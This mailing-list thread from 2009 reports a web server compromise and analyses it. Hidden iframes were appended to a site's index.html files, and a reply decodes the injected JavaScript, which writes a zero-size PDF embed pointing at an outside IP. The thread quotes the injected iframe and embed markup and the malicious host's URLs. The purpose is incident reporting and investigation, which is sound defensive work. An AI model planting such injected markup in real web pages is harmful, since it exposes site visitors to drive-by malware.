Re: Malicious code just found on web server

[Chris Mills <securinate () gmail com>]

I took a quick look at the code... formatted it in a pastebin here:
http://pastebin.com/m7b50be54

That javascript writes this to the page (URL obscured):
document.write("<embed
src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\"
width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");

The 1.2.3.4 in the URL is my public IP address (I changed that).

Below the javascript, it grabs a PDF:
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>

That PDF is on the site, I haven't looked at it yet though.

-ChrisAM
http://securabit.com

On Fri, Apr 17, 2009 at 4:42 PM, Russell Berg <berg () wins net> wrote:
> FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com
>
> -----Original Message-----
> From: Russell Berg
> Sent: Friday, April 17, 2009 3:39 PM
> To: 'nanog () nanog org'
> Subject: Malicious code just found on web server
>
> We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 
> 11:00 central time hour today:
>
> src="http://77.92.158.122/webmail/inc/web/index.php";
> style="display: none;" height="0" width="0"></iframe> <iframe src="http://77.92.158.122/webmail/inc/web/index.php";
> style="display: none;" height="0" width="0"></iframe> </body> </html>
>
> IP address resolves to mail.yaris.com; couldn't find any A/V site references to this.
>
> Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation.
>
> Just a heads up for folks; we have a team investigating...
>
> Russell Berg
> Dir - Product Development
> Airstream Communications
> berg () wins net
> 715-832-3726